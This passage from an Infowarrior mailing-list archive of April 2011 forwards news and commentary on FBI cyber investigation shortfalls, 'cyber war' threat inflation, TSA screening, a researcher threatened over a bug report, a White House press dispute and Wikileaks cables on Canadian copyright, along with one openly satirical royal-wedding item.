Among the issues that impeded developing strong expertise and solving cyber investigations was the practice of rotating field agents to a new field office every three years, the inspector general said. After rotating to a new office, an agent with cyber investigation experience often is not assigned to a cyber unit, "leaving their cyber background underutilized."

"When a foreign country uses computer networks to attack a cleared-defense contractor in Memphis, it uses the same technology and techniques" as an attack on a defense contractor in New York, the inspector general's report said.

The FBI cybersquads were also not as effective as they could be because the squads did not always have intelligence analysts embedded in their units to provide a strategic perspective and overall threat analysis, the inspector general found. The FBI also "failed to share information better with other agencies in the joint task force," the report said.

In its written response to the critical report, FBI associate deputy director T.J. Harrington concurred with 10 recommendations in the report and noted that the bureau had met 20 of 22 mandates outlined in the president's Comprehensive National Cybersecurity Initiative. The bureau also outlined a number of other steps it is taking to cultivate cyber expertise and said it is also considering "developing regional hubs with agents expert in investigating national security intrusions."

From rforno at infowarrior.org Thu Apr 28 06:02:29 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Thu, 28 Apr 2011 07:02:29 -0400
Subject: [Infowarrior] - Are we talking "cyber war" like the Bush admin talked WMDs?
Message-ID: <16CCEC12-375B-4117-A43E-848D8151A94C@infowarrior.org>

Are we talking "cyber war" like the Bush admin talked WMDs?
By Matthew Lasar | Last updated about 10 hours ago
http://arstechnica.com/security/news/2011/04/are-we-talking-cyber-war-like-the-bush-admin-talked-wmds.ars

Turn any corner in the complex metropolis that is Internet policy and you'll hear about the "cybersecurity" crisis in two nanoseconds. As a consequence, the public is treated to a regular diet of draconian fare coming from Sixty Minutes and Fresh Air about the "growing cyberwar threat."

Former National Security Adviser Richard A. Clarke suggests a thought exercise in his hit book Cyber War: imagine you are the assistant to the president for Homeland Security. The National Security Agency has just sent a critical alert to your BlackBerry: "Large scale movement of several different zero day malware programs moving on Internet in US, affecting critical infrastructure." As you get to your HQ, one of the DoD's main networks has already crashed; computer system failures have caused huge refinery fires around the country; the Federal Aviation Administration's air traffic control center in Virginia is collapsing, and that's just the beginning. "The Chairman of the Fed just called," the Secretary of the Treasury tells you. "Their data centers and their backups have had some sort of major disaster. They have lost all their data." Power blackouts are sweeping the country. Thousands of people have already died. "There is more going on," Clarke narrates, "but the people who should be reporting to you can't get through."

This sort of scare-the-children prose has become something close to the norm, complain George Mason University Mercatus Center researchers Jerry Brito and Tate Watkins in a new working paper about what they see as the real problem: "threat inflation."

"The rhetoric of 'cyber doom'," Brito and Watkins write, "lacks clear evidence of a serious threat that can be verified by the public.
As a result, the United States may be witnessing a bout of threat inflation similar to that seen in the run-up to the Iraq War. Additionally, a cyber-industrial complex is emerging, much like the military-industrial complex of the Cold War. This complex may serve to not only supply cybersecurity solutions to the federal government, but to drum up demand for them as well."

Our past experience

The paper's title is "Loving the Cyber Bomb? The Dangers of Threat Inflation in Cybersecurity Policy." As that last paragraph suggests, these authors see a clear and present parallel between the cyberwar debate and the rhetoric of the Bush administration after September 11, 2001. First, the paper notes, the White House implied that Iraq's then dictator Saddam Hussein had something to do with the attacks on New York City and the Pentagon. Then the government convinced influential newspapers like The New York Times to favorably quote administration leaks suggesting that Iraq possessed weapons of mass destruction. Both of these assertions were ultimately debunked, but the damage was done. As late as 2006, polls indicated that 40 percent of the US population still thought that Hussein was somehow in on 9/11.

As with that story, "there is very little verifiable evidence" to back up the cyber threats claimed now, "and the most vocal proponents of a threat engage in rhetoric that can only be characterized as alarmist," Brito and Watkins write. "Cyber threat inflation parallels what we saw in the run-up to the Iraq War."

Probed daily

The paper is particularly hard on the report of the Commission on Cybersecurity for the 44th Presidency. Launched by the Center for Strategic and International Studies, it came complete with a distinguished panel of academics, consultants, IT industry biggies, and former government officials.
What it didn't come with, the Mercatus study contends, was much evidence for the dire situation it posited: that the protection of cyberspace "is a battle we are losing." For example, the CSIS report warned that Department of Defense computers are "probed hundreds of thousands of times each day." But of course that's true, the paper notes. Probing and scanning are the norm in cyberspace, with software constantly trying the doors of websites and portals.

Then the blue ribbon document contended that "porous information systems have allowed opponents to map our vulnerabilities and plan their attacks."

Depriving Americans of electricity, communications, and financial services may not be enough to provide the margin of victory in a conflict, but it could damage our ability to respond and our will to resist. We should expect that exploiting vulnerabilities in cyber infrastructure will be part of any future conflict.

Where, the Mercatus researchers ask, was the evidence that America's opponents have "mapped vulnerabilities" and "planned attacks"? These sort of reports often imply that they're working from classified sources. But: "If our past experience with threat inflation teaches us anything, it is that we cannot accept the word of government officials with access to classified information as the sole source of evidence for the existence or scope of a threat."

Clarke and the present danger

Richard Clarke's doomsday scenarios are next on the Mercatus paper's takedown list. Clarke's book cites the distributed denial of service attacks on Estonian and Georgian websites in 2007 and 2008 as particularly ominous. Obviously these assaults were serious and consequential, Brito and Watkins agree. But how do we get from botnet-infested computers or networks to the blackout, fire, and infrastructure collapse scenarios that Cyber War posits?
We just don't, they insist, and they also take Clarke to task for citing the Brazil blackout of 2007 as another Exhibit A for future cyber eschatologies. The going thesis for a while was that the disaster was prompted by a criminal hacking. But subsequent probes of the crisis by the power company and its regulator concluded that dirt on high voltage insulators caused the outage. Ditto for the Northeast power blackout of 2003, suspected of being part of a worm-based cyberattack, found to be no such thing in a subsequent investigation.

It's pretty obvious that these researchers deplore Clarke's book, especially speculations that the Russians "are probably saving their best cyber weapons for when they really need them, in a conflict in which NATO and the United States are involved." This sort of prose is "eerily reminiscent of the suggestion before the invasion of Iraq that although we lacked the type of evidence of WMD that might lead us to action, we would not want 'the smoking gun to be a mushroom cloud'," Brito and Watkins write.

Cyber pork

The Mercatus authors see very little good in this rhetoric, and many bad outcomes. They see unjustified regulation of the Internet as one possibility, and as Ars readers know, Congress has considered a bill that at one point would have given the president the authority to shut the 'Net down in the event of a cyberattack. They also see corporations ratcheting up the volume on the issue to bring in defense contracting dollars, and politicians joining the panic party to deliver federal money to their districts. But ultimately what they see is a scare mongering discourse that will make it impossible to realistically assess the cybersecurity situation.

"Let us be very clear," their essay acknowledges: "although we are skeptical of the scope of the threat as presented by the proponents of regulation, we do not doubt that cyber threats do exist, nor would we suggest that regulation can never be appropriate.
What we do propose is that before we rush to regulate cyberspace we should first demand verifiable evidence of the threat and its scope and, second, we should use any such evidence to conduct a proper analysis to determine whether regulation is necessary and if it will do more good than harm."

From rforno at infowarrior.org Thu Apr 28 06:52:11 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Thu, 28 Apr 2011 07:52:11 -0400
Subject: [Infowarrior] - FBI chasing down WoW gold farmers
Message-ID: <100CED0D-39AB-49AE-AF6C-807F0553DA50@infowarrior.org>

Yeah, okay .... that's definitely something they need to be working on right now. I'd say "Epic Fail" but we are talking about the Bureau after all.

--- rick

FBI Hunting Down World Of Warcraft Gold Farmers?
from the that'll-keep-us-safe dept

Just as the World Bank has put out an entire research report about the economics of virtual gold farmers (they claim it's a $3 billion plus industry, and has substantial impact on developing economies), it appears that the FBI is taking an interest in the practice as well. Just last month, the FBI apparently raided a Michigan home in search of virtual World of Warcraft gold. The university students who lived in the raided apartment claim that the FBI targeted the wrong place, and say that neither of them play World of Warcraft, but all of their computer equipment was seized. There aren't full details on the warrant, but the accusation suggests that there was some sort of virtual gold buying and selling fraud going on. I recognize these things can happen for quite a bit of money, but is this really the best use of the FBI's time?
http://www.techdirt.com/articles/20110408/03292413827/fbi-hunting-down-world-warcraft-gold-farmers.shtml

From rforno at infowarrior.org Thu Apr 28 06:53:42 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Thu, 28 Apr 2011 07:53:42 -0400
Subject: [Infowarrior] - We've Trained The TSA To Search For Liquid Instead Of Bombs
Message-ID: <562297FD-31ED-431E-B8D1-EDEA975D0743@infowarrior.org>

We've Trained The TSA To Search For Liquid Instead Of Bombs
from the feeling-safer-yet? dept
http://www.techdirt.com/articles/20110427/01531214053/weve-trained-tsa-to-search-liquid-instead-bombs.shtml

In the latest example of absolute insanity from the TSA and the way in which it conducts airport searches, "Patrick Smith," a pseudonymous pilot who writes about airline topics for Salon, tells the story of a ridiculous TSA encounter he had while flying as a passenger. It happened because Smith didn't put all his liquids into a ziploc plastic baggy, as required. He apparently never does this and rarely has problems (I've also found that I've never been stopped when I fail to produce the plastic baggy). However, this time he did. But it wasn't just that the TSA called him out for this, it was what happened after he obliged and put the liquids in a plastic bag:

My carry-on goes through the scanner and comes out the other side. One of the guards squints at his monitor, then shoots me a hostile look. What's this, no plastic baggie? He pulls my luggage aside, opens it, and asks me to repack my liquids and gels "the right way." I do as he wants. When I'm finished, I hand him the baggie so he can run the items through again. To my surprise, he won't take them. "No," he says. "Just put them in your suitcase and go." But ... "Just put them in your suitcase and go." I look at him for a minute. Apparently my having to repack them was a punishment exercise? All right, fine.
Lesson learned, I unzip the approved, one-quart zip-top bag, and begin to dump the containers back into my toiletries kit. "No!" interjects the guard. "Leave them in the plastic!" "Huh?" "You have to leave them in the plastic bag!" "But I'm already through the checkpoint. You already screened them." He shrugs. "They need to stay in the bag." "No they don't." "Yes they do." "Why?" "They need to stay in the bag. You should know better."

Smith does a good job highlighting the absurdity of all of this and pointing out, of course, that the guard is wrong. But later in the post he really keys in on the scary point of all of this: we've trained the TSA to look for unbagged liquids, rather than explosives. And they're doing that successfully:

Are we looking for liquids, or are we looking for explosives? A search for the former is not a de facto search for the latter. Not the way we've been doing it. Steve Elson tells the story of a test in which TSA screeners are presented with a suitcase containing a mock explosive device with a water bottle nestled next to it. They ferret out the water, of course, while the bomb goes sailing through.

It's yet another case of where security theater is actually making us less safe. We've set up these rules that don't really help protect anyone, and yet the TSA folks are taught to follow the rules, rather than look for anyone actually looking to cause harm on an airplane.

From rforno at infowarrior.org Thu Apr 28 07:56:47 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Thu, 28 Apr 2011 08:56:47 -0400
Subject: [Infowarrior] - VeryVeryVery OT: 'Operation Pumpkin'
Message-ID:

From a security planning perspective, this is just an amusing read. Not surprised to see such a contingency planned for, but it's still amusing to see it in print.
--- rick

Revealed: Secret security plan should Kate leave Wills at the altar
http://www.theregister.co.uk/2011/04/28/operation_pumpkin/
'Operation Pumpkin' prepped for royal runaway bride scenario
By Marmaduke LaHussy, Reg royal correspondent
Posted in Bootnotes, 28th April 2011 11:15 GMT

Police and spooks in charge of security for tomorrow's royal wedding have planned for every possible eventuality - including that of Kate leaving Wills at the altar.

The top-secret contingency plan for a "runaway bride" scenario has been dubbed "Operation Pumpkin", and if put into effect would see hundreds of operatives switch tasks in a desperate attempt to generate a moving security cordon around the escaping future Queen - while simultaneously attempting to preserve Prince William's option to pursue and dramatically win her back.

"Frankly, it's a nightmare scenario," one highly-placed MI5 source confessed to the Reg yesterday. "But you have to plan for every possible contingency, and let's face it, this one's hardly that unlikely, is it? Obviously we had to get together with Clarence House and work something out.

"Naturally, they wanted us to simply make her go through with it - but we said you must be joking: in the UK, in front of millions of witnesses? No way. And the plods would never play ball anyhow.

"So we said, look, if she bottles it we'll just have to get her out pronto, helicopter off the roof maybe, then sort her out with a new identity and young Bill will just have to go on the honeymoon on his own."

However our source said that royal officials were unhappy with that plan. They reluctantly accepted that Ms Middleton remains free to bolt right up until the last moment, but argued that she should be compelled to flee on foot for at least a short distance, so allowing the Prince to pursue her and so perhaps regain some PR benefit for the royal family - and maybe even persuade the absconding future consort to come up to scratch once more.
"That's when it got difficult," says our source. "Now you've got her running out of the Abbey, crowds everywhere, him chasing after her. She's got to be able to run, he's got to be able to catch up if he can. Nightmare."

After protracted, top-secret negotiations between royal staff from Clarence House and representatives from the Metropolitan Police, MI5 and elements of the military, a compromise was agreed. In the event of Operation Pumpkin being put into effect Ms Middleton will be permitted to run out of Westminster Abbey with her bodyguards trailing discreetly at a distance. Plain-clothes undercover police, MI5 officers and SAS soldiers stationed in the crowd will form a mobile flying wedge ahead of her, clearing a path for the fugitive future princess to escape down.

Prince William will then have a limited time, the subject of tense negotiations between Clarence House and security chiefs, in which the path behind Ms Middleton will be kept open for him to go after her, after which the mobile protective cordon will close again at the Abbey end due to lack of manpower and the Prince will have let his bride slip through his fingers. If Wills reacts fast enough, however, he will be able to chase after his fleeing fiancee for just under half a mile.

"Clarence House wanted a full mile," says our source. "But we said come on, play fair, she's in her wedding dress and there has to be some limit on the overtime budget."

If the Prince fails to intercept Ms Middleton over that distance, the security team will decide that no on-the-spot reconciliation is possible and a strategically positioned taxi, driven by an undercover SAS operative and unobtrusively escorted by several unmarked police cars, will opportunely pull up to carry the escaping ex-future-princess to safety. On the other hand if Wills manages to come up with Kate he will be allowed to attempt to persuade her to return with him for a limited period.
"We got Clarence House to cut that by a few minutes by agreeing they could put ringers in the crowd to shout stuff like 'Go on love, give him a kiss'," reveals our source.

It is understood that royal officials are hoping that there will be no need for Operation Pumpkin, but anticipate a significant boost to the wedding's TV ratings if it does go into effect.

We asked our source what plans were in place should Wills, rather than Kate, attempt to flee the wedding. "Come off it," he said. "We only plan for things that make sense. He doesn't want to be back on the dating scene wearing a rug, does he?"

From rforno at infowarrior.org Fri Apr 29 13:21:53 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Fri, 29 Apr 2011 14:21:53 -0400
Subject: [Infowarrior] - ICANN taps DefCon founder for top security spot
Message-ID:

ICANN taps DefCon founder for top security spot
29 Apr 2011, Shaun Nichols, V3
http://www.v3.co.uk/print_article/v3-uk/news/2046681/icann-taps-defcon-founder-security-spot

The Internet Corporation for Assigned Names and Numbers (ICANN) has named Jeff Moss as its new chief security officer. A security expert and respected member of the hacking community, Moss is best known for his roles in founding the DefCon and Black Hat security conferences. He has also worked in advisory positions for the US Department of Homeland Security.

The appointment of Moss will bring to ICANN a security head who is well-versed in the attitudes and techniques which have driven research in both security intrusions and detections in recent years. The hiring also comes at a time when ICANN and other internet governance groups are working to roll out security measures such as DNSSEC.

"I can think of no one with a greater understanding of the security threats facing Internet users and how best to defend against them than Jeff Moss," said ICANN president and chief executive Rod Beckstrom.
"He has the in-depth insider's knowledge that can only come from fighting in the trenches of the on-going war against cyber threats."

The hiring is also earning praise within the security community. Dave Marcus, a DefCon veteran and head of research and communications for McAfee Labs, hailed the move as "a great appointment" for ICANN. "They are bringing in someone who has an understanding of it from a completely different perspective," Marcus told V3.co.uk. "He understands how the internet can be used in both positive and negative ways, and up until now they have not had a positive approach to deal with things like cyber crime."

ICANN said that Moss will begin working with the group on 29 April at its offices in Washington, DC.

From rforno at infowarrior.org Fri Apr 29 17:41:41 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Fri, 29 Apr 2011 18:41:41 -0400
Subject: [Infowarrior] - DOJ: FBI digital counterintelligence weakened by focus on child porn
Message-ID:

DOJ: FBI digital counterintelligence weakened by focus on child porn
Cyberattacks are at an all time high; FBI spends twice as much effort fighting porn
By Kevin Fogarty
http://www.itworld.com/security/160701/doj-fbi-cyber-security-largely-incompetent-obsessed-child-porn
April 29, 2011, 11:35 AM

Despite its growing digital surveillance capabilities and increasing responsibility for investigating and countering cyber attacks on the U.S., the FBI's core cyber security division turns out to be basically incompetent, according to a critical report from the Dept. of Justice. [PDF]

Part of the reason is that the 14 agencies that share some responsibility for online counter-espionage don't share information well. Another contributor is the lack of effective pressure from top managers to get agents trained in national-security intrusion topics and tactics.
Most of the reason is that the FBI spends twice as much effort investigating child porn as it does attempts by foreign governments to attack U.S. facilities or steal information that would damage U.S. national security, the report found.

To put that in perspective, the number of foreign attacks on the U.S. increased 40 percent between 2007 and 2008, according to the report, whose data are pretty old for such a sensitive topic.

An April study from McAfee showed 80 percent of utilities in 14 countries had been attacked during the previous year, an increase of almost 50 percent compared to the year before. Attacks ranged from distributed denial of services to intrusions to remove data to intrusions that attempted to take control of the utility's internal IT systems. And that's just among civilian-run utility companies.

State Dept. documents released through WikiLeaks this month showed that years-long cyberattacks launched by the Chinese military had netted "terabytes" of sensitive data ranging from names and passwords that would give access to State Department computers, to the design of major weapons systems. The "Byzantine Hades" attacks - and others coming from Russia and other unfriendly powers - represent a new state of cyberwar the U.S. is not yet prepared to fight.

The attacks have been so successful "we have given up on the idea we can keep our networks pristine," according to Stewart Baker, a former senior cyber-security official at the U.S. Department of Homeland Security and National Security Agency. The focus has shifted instead to more sophisticated efforts to detect and counter intrusions as they're made.

Unfortunately, those are exactly the kinds of skills the FBI cyber squads lack and the kind of crime they don't have the time or resources to investigate. Of 36 agents with cybersecurity responsibilities the DOJ tested - from 10 of the agency's 56 field offices, each of which has at least one "cyber squad" -
only 23 told investigators they had the training to investigate national security intrusions. The other 13 "lacked the networking and counterintelligence expertise to investigate national security intrusion cases." Five said they were completely unqualified to investigate national security intrusions effectively, the report said.

In 2007 the FBI created a separate career path for digital security investigators called the Cyber Career Path, which includes a four-stage training plan covering 12 core courses and a set of elective courses agents can use to develop a specialty. The agency's habit of moving agents to new offices or new assignments every two or three years to expand their skills or experience makes completing that training difficult, the report concluded. So does a generally inconsistent focus on both online counter-espionage and giving agents either the training or time to build experience in investigating it. Top FBI managers are much more comfortable with agents trained to track down domestic hackers and breaking down doors than they are investigating or countering serious online attacks from overseas.

The report - some information in which was blacked out to avoid releasing sensitive or top secret information to which the public should not have access - included the total number of agents who had completed all 12 courses as of June, 2010. The number was the only part of the paragraph explaining the program that was redacted.

Online espionage isn't the FBI cyber squads' only responsibility, however. In 2009, 19 percent of the cyber agents worked on national security intrusion investigations, while 31 percent worked on non-spy-related digital crimes and 41 percent investigated online child porn. That's not to say child porn and domestic, non-national-security related cybercrime should not be investigated.
When you're losing terabytes of sensitive data to foreign governments who can walk freely through your most secure computer systems, however, maybe it's time to reconsider your priorities. Maybe shift a few agents away from the wankers and point them toward the enemy?

From rforno at infowarrior.org Fri Apr 29 20:02:43 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Fri, 29 Apr 2011 21:02:43 -0400
Subject: [Infowarrior] - Legal goons threaten researcher for reporting security bug
Message-ID: <06889905-B10B-4FC8-801F-117207502BCA@infowarrior.org>

Legal goons threaten researcher for reporting security bug
When vuln disclosures are outlawed...
By Dan Goodin in San Francisco
Posted in Security, 29th April 2011 23:12 GMT
http://www.theregister.co.uk/2011/04/29/security_researcher_threatened/

A German software company has threatened legal action against a security researcher who privately reported a critical vulnerability in one of its programs, Dark Reading reports.

Legal goons from Magix AG sent a nasty gram to a researcher who goes by "Acidgen" after he reported the stack buffer overflow in the company's Music Maker 16. According to the report, Acidgen alerted Magix representatives to the bug in several emails that also included proof-of-concept code that forced the Windows calculator to open, indicating the flaw could be exploited to execute malicious code on a victim's computer. Acidgen also provided suggestions for fixing the flaw, Dark Reading said. He also told the representatives he planned to disclose vulnerability details publicly once a patch was released.

That's when things got ugly.

"MAGIX does not appreciate that you are intending to publicly release the Exploit and to cause irreparable harm," a company attorney wrote. "As you maybe [sic] aware it is illegal to release software which is intended to commit computer sabotage (e.g. Sec. 202C I No. 2 German Criminal Law).
In addition this announcement together with your offering to have the vulnerability fixed by your company may be considered as an attempted extortion."

The letter said Magix would "enter into all necessary and appropriate legal steps" and to "inform manufacturers of antivirus software that there might be a new virus based on your code."

Germany enacted a draconian hacker law in 2007 that also criminalizes the creation or possession of dual-use security tools.

From rforno at infowarrior.org Fri Apr 29 21:33:53 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Fri, 29 Apr 2011 22:33:53 -0400
Subject: [Infowarrior] - WH in press intimidation flap
Message-ID: <18EA7ABC-9B42-4DF0-9C8D-697EBA6E9DB9@infowarrior.org>

Update: Chronicle responds after Obama Administration punishes reporter for using multimedia, then claims they didn't
http://www.sfgate.com/cgi-bin/blogs/bronstein/detail?entry_id=87978&tsp=1

Update: In a pants-on-fire moment, the White House press office today denied anyone there had issued threats to remove Carla Marinucci and possibly other Hearst reporters from the press pool covering the President in the Bay Area. Chronicle editor Ward Bushee called the press office on its fib:

Sadly, we expected the White House to respond in this manner based on our experiences yesterday. It is not a truthful response. It follows a day of off-the-record exchanges with key people in the White House communications office who told us they would remove our reporter, then threatened retaliation to Chronicle and Hearst reporters if we reported on the ban, and then recanted to say our reporter might not be removed after all. The Chronicle's report is accurate. If the White House has indeed decided not to ban our reporter, we would like an on-the-record notice that she will remain the San Francisco print pool reporter.

I was on some of those calls and can confirm Ward's statement. Messy ball now firmly in White House court.
-----

The hip, transparent and social media-loving Obama administration is showing its analog roots. And maybe even some hypocrisy highlights.

White House officials have banished one of the best political reporters in the country from the approved pool of journalists covering presidential visits to the Bay Area for using now-standard multimedia tools to gather the news.

The Chronicle's Carla Marinucci - who, like many contemporary reporters, has a phone with video capabilities on her at all times - shot some protesters interrupting an Obama fundraiser at the St. Regis Hotel. She was part of a "print pool" - a limited number of journalists at an event who represent their bigger horde of colleagues - which White House press officials still refer to quaintly as "pen and pad" reporting.

But that's a pretty Flintstones concept of journalism for an administration that presents itself as the Jetsons. Video is every bit a part of any journalist's tool kit these days as a functioning pen that doesn't leak through your pocket.

In fact, Carla and her reporting colleague, Joe Garofoli, founded something called "Shaky Hand Productions" - the semi-pro, sometimes vertiginous use of a Flip or phone camera by Hearst reporters to catch more impromptu or urgent moments during last year's California gubernatorial race that might otherwise be missed by TV. The name has become its own brand; often politicians even ask if anyone from Shaky Hand will show at their event.

For Carla, Joe and reporters at other Hearst newsrooms where Shaky Hand has taken hold, this was an appropriate dive into use of other media by traditional journalists catering to audiences who expect their news delivered in all modes and manners. That's the world we live in and the President of the United States claims to be one of its biggest advocates.

Just the day before Carla's Stone Age infraction, Mr. Obama was at Facebook seated next to its founder, Mark Zuckerberg, and may as well have been wearing an "I'm With Mark" t-shirt for all the mutual admiration going back and forth.

"The main reason we wanted to do this is," Obama said of his appearance, "first of all, because more and more people, especially young people, are getting their information through different media. And historically, part of what makes for a healthy democracy, what is good politics, is when you've got citizens who are informed, who are engaged."

Informed, in other words, through social and other digital media where videos of news are posted. The President and his staffers deftly used social media like Twitter and Facebook in his election campaign and continue to extol the virtues and value. Except, apparently, when it comes to the press.

So what's up with the White House? We can't say because neither Press Secretary Jay Carney nor anyone from his staff would speak on the record. Other sources confirmed that Carla was vanquished, including Chronicle editor Ward Bushee, who said he was "informed that Carla was removed as a pool reporter." Which shouldn't be a secret in any case because it's a fact that affects the newsgathering of our largest regional paper (and sfgate) and how local citizens get their information.

What's worse: more than a few journalists familiar with this story are aware of some implied threats from the White House of additional and wider punishment if Carla's spanking became public. Really? That's a heavy hand usually reserved for places other than the land of the free.

But bravery is a challenge, in particular for White House correspondents, most of whom are seasoned and capable journalists. They live a little bit in a gilded cage where they have access to the most powerful man in the world but must obey the rules whether they make sense or not.
CBS News reporter Mark Knoller has publicly protested the limited press access to Obama fundraisers, calling the policy "inconsistent." "It's no way to do business," wrote Politico's Julie Mason, "especially [for] a candidate who prides himself on transparency." A 2009 blog by the White House Director of New Media states that "President Obama is committed to making his administration the most open and transparent in history."

Not last week. Mason referred to the San Francisco St. Regis protest as "a highly newsworthy event" where "reporters had to rely on written pool reports..." Except, thanks to Carla's quick action with her camera, they didn't.

I get that all powerful people and institutions want to control their image and their message. That's part of their job, to create a mythology that allows them to continue being powerful. But part of the press' job is to do the opposite, to strip away the cloaks and veneers.

By banning her, and by not acknowledging how contemporary media works, the White House did not just put Carla in a cage but more like one of those stifling pens reserved for calves on their way to being veal. Carla cannot do her job to the best of her ability if she can't use all the tools available to her as a journalist.

The public still sees the videos posted by protesters and other St. Regis attendees, because the technology is ubiquitous. But the Obama Administration apparently wants to give the distinct advantage to citizen witnesses at the expense of professionals. Why? Well, they won't tell us.

Some White House reporters are grumbling almost as much as the Administration about Carla's "breaking the rules." I can understand how they'd be irritated. If you didn't get the video because you understood you weren't supposed to, why should someone else get it who isn't following the longstanding civilized table manners?
The White House Press Correspondents' Association pool reporting guidelines warn about "no hoarding" of information and also say, "pool reports must be filed before any online story or blog." While uploading her video probably was the best way to file her report, Carla may have technically busted the letter of that law. But the guidelines also say, "Print poolers can snap pictures or take video. They are not obliged to share these pictures...but can make them available if they so choose."

Then what guidelines is the White House applying here? Again, we don't know.

What the Administration should have done is to use this incident to precipitate a reasonable conversation about changing their 1950s policies into rules more suited to 2011. Dwight Eisenhower was the last President who let some new media air into the room when he lifted the ban on cameras at press conferences in 1952.

"We've come full circle here," Tom Rosenstiel, director of the Pew Foundation's Project for Excellence in Journalism, told me today. "A newspaper reporter is being punished because she took pictures with a moving camera. We live in a world where there are no longer distinctions. The White House is trying to live by 20th century distinctions."

The President's practice not just with transparency but in other dealings with the press has not been tracking his words, despite the cool glamour and easy conversation that makes him seem so much more open than the last guy. It was his administration that decided to go after New York Times reporter James Risen to get at his source in a book he wrote about the CIA. For us here in SF who went through the BALCO case and other fisticuffs with the George W. Bush Attorney General's prosecutors, this is deja vu.

Late today, there were hints that the White House might be backing off the Carla Fatwa. Barack Obama sold himself successfully as a fresh wind for the 21st century.
In important matters of communication, technology, openness and the press, it's not too late for him to demonstrate that.

From rforno at infowarrior.org Sat Apr 30 18:25:49 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Sat, 30 Apr 2011 19:25:49 -0400
Subject: [Infowarrior] - Wikileaks Cables Show Massive U.S. Effort to Establish Canadian DMCA
Message-ID: <7B5C6094-5D7E-46ED-AC57-E8D972971994@infowarrior.org>

Wikileaks Cables Show Massive U.S. Effort to Establish Canadian DMCA
Friday April 29, 2011

Wikileaks has released dozens of new U.S. cables that demonstrate years of behind the scenes lobbying by U.S. government officials to pressure Canada into implementing a Canadian DMCA. The cables include confirmation that Prime Minister Harper personally promised U.S. President George Bush at the SPP summit in Montebello, Quebec in 2008 that Canada would pass copyright legislation, U.S. government lines on copyright reform that include explicit support for DMCA-style digital lock rules, and the repeated use of the Special 301 process to "embarrass" Canada into action. In fact, cables even reveal Canadian officials encouraging the U.S. to maintain the pressure and disclosing confidential information. This post highlights some of the key cables. An earlier post discussed confirmation that public pressure delayed the introduction of a copyright bill in 2008 and a parallel post focuses on the linkages between CRIA and the U.S. government lobbying effort.

< -- >

http://www.michaelgeist.ca/content/view/5765/125/